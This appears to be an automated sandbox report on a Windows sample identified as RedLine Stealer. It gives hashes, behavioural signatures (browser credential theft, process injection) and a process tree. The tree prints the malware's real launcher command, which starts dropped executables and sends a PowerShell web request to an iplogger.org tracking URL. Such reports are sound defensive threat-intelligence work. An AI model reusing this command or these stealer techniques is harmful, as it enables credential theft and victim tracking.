Analysis
-
max time kernel
137s -
max time network
148s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
21-03-2021 12:01
Static task
static1
Behavioral task
behavioral1
Sample
38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe
Resource
win10v20201028
General
-
Target
38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe
-
Size
1.1MB
-
MD5
f5366963764901262499c8021333f986
-
SHA1
e57b794220e7a6184614ccd4a6ddcf99de7e0717
-
SHA256
38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f
-
SHA512
84cde9fd4846e839fee7171546c76253c321af4bc619e2b0b4830077b9d966251e36217f60c6da6c31258770fbf71284a1896a7bc5b388c609ebf18be9c048d6
Malware Config
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/3224-53-0x0000000000400000-0x0000000000428000-memory.dmp family_redline behavioral2/memory/3224-54-0x0000000000421DFE-mapping.dmp family_redline -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 14 2212 powershell.exe -
Executes dropped EXE 5 IoCs
Processes:
hello_C# (2).exehello_C#.exejayson.exeriv.exejayson.exepid process 3264 hello_C# (2).exe 3456 hello_C#.exe 2972 jayson.exe 3960 riv.exe 3224 jayson.exe -
Loads dropped DLL 1 IoCs
Processes:
38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exepid process 1812 38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
jayson.exedescription pid process target process PID 2972 set thread context of 3224 2972 jayson.exe jayson.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 2212 powershell.exe 2212 powershell.exe 2212 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exejayson.exedescription pid process Token: SeDebugPrivilege 2212 powershell.exe Token: SeDebugPrivilege 3224 jayson.exe -
Suspicious use of WriteProcessMemory 24 IoCs
Processes:
38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.execmd.exejayson.exedescription pid process target process PID 1812 wrote to memory of 3504 1812 38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe cmd.exe PID 1812 wrote to memory of 3504 1812 38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe cmd.exe PID 1812 wrote to memory of 3504 1812 38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe cmd.exe PID 3504 wrote to memory of 3264 3504 cmd.exe hello_C# (2).exe PID 3504 wrote to memory of 3264 3504 cmd.exe hello_C# (2).exe PID 3504 wrote to memory of 3456 3504 cmd.exe hello_C#.exe PID 3504 wrote to memory of 3456 3504 cmd.exe hello_C#.exe PID 3504 wrote to memory of 2972 3504 cmd.exe jayson.exe PID 3504 wrote to memory of 2972 3504 cmd.exe jayson.exe PID 3504 wrote to memory of 2972 3504 cmd.exe jayson.exe PID 3504 wrote to memory of 3960 3504 cmd.exe riv.exe PID 3504 wrote to memory of 3960 3504 cmd.exe riv.exe PID 3504 wrote to memory of 3960 3504 cmd.exe riv.exe PID 3504 wrote to memory of 2212 3504 cmd.exe powershell.exe PID 3504 wrote to memory of 2212 3504 cmd.exe powershell.exe PID 3504 wrote to memory of 2212 3504 cmd.exe powershell.exe PID 2972 wrote to memory of 3224 2972 jayson.exe jayson.exe PID 2972 wrote to memory of 3224 2972 jayson.exe jayson.exe PID 2972 wrote to memory of 3224 2972 jayson.exe jayson.exe PID 2972 wrote to memory of 3224 2972 jayson.exe jayson.exe PID 2972 wrote to memory of 3224 2972 jayson.exe jayson.exe PID 2972 wrote to memory of 3224 2972 jayson.exe jayson.exe PID 2972 wrote to memory of 3224 2972 jayson.exe jayson.exe PID 2972 wrote to memory of 3224 2972 jayson.exe jayson.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe"C:\Users\Admin\AppData\Local\Temp\38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1812 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "hello_C# (2).exe" & start "" "hello_C#.exe" & start "" "jayson.exe" & start "" "riv.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1iRpu7"2⤵
- Suspicious use of WriteProcessMemory
PID:3504 -
C:\Users\Admin\AppData\Local\Temp\hello_C# (2).exe"hello_C# (2).exe"3⤵
- Executes dropped EXE
PID:3264 -
C:\Users\Admin\AppData\Local\Temp\hello_C#.exe"hello_C#.exe"3⤵
- Executes dropped EXE
PID:3456 -
C:\Users\Admin\AppData\Local\Temp\jayson.exe"jayson.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Users\Admin\AppData\Local\Temp\jayson.exe"{path}"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3224 -
C:\Users\Admin\AppData\Local\Temp\riv.exe"riv.exe"3⤵
- Executes dropped EXE
PID:3960 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1iRpu7"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2212
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
0c2899d7c6746f42d5bbe088c777f94c
SHA1622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1
SHA2565b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458
SHA512ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078
-
MD5
d6b9f530e7e8ddebea8069a0d94ad38e
SHA128b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67
SHA2563e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904
SHA5122f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815
-
MD5
d6b9f530e7e8ddebea8069a0d94ad38e
SHA128b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67
SHA2563e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904
SHA5122f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815
-
MD5
d6b9f530e7e8ddebea8069a0d94ad38e
SHA128b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67
SHA2563e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904
SHA5122f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815
-
MD5
d6b9f530e7e8ddebea8069a0d94ad38e
SHA128b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67
SHA2563e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904
SHA5122f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815
-
MD5
68f70e9545a6dbeecd3e2eba38c197ca
SHA15d0fdc7452e3af1c4d7b145256888687e5fd2a72
SHA256a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804
SHA51299f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9
-
MD5
68f70e9545a6dbeecd3e2eba38c197ca
SHA15d0fdc7452e3af1c4d7b145256888687e5fd2a72
SHA256a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804
SHA51299f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9
-
MD5
68f70e9545a6dbeecd3e2eba38c197ca
SHA15d0fdc7452e3af1c4d7b145256888687e5fd2a72
SHA256a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804
SHA51299f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9
-
MD5
bd96d90751fd507c3af0edbe0d596ec4
SHA1eed0bb7626d328190c7de701c0071f9c4ad048ef
SHA256f34caf8fccb7eddad3f4cde91939d6d87644b5703f67ea0546f3cf0f6c1171db
SHA5125948bed6635306588b1c2f954bfe62657b3929e8f7f23ce6a1f3db494d657518399e9b1812ba0daa78f07cf5205d85ae765049961723886604765461b7b68338
-
MD5
bd96d90751fd507c3af0edbe0d596ec4
SHA1eed0bb7626d328190c7de701c0071f9c4ad048ef
SHA256f34caf8fccb7eddad3f4cde91939d6d87644b5703f67ea0546f3cf0f6c1171db
SHA5125948bed6635306588b1c2f954bfe62657b3929e8f7f23ce6a1f3db494d657518399e9b1812ba0daa78f07cf5205d85ae765049961723886604765461b7b68338
-
MD5
293165db1e46070410b4209519e67494
SHA1777b96a4f74b6c34d43a4e7c7e656757d1c97f01
SHA25649b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a
SHA51297012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19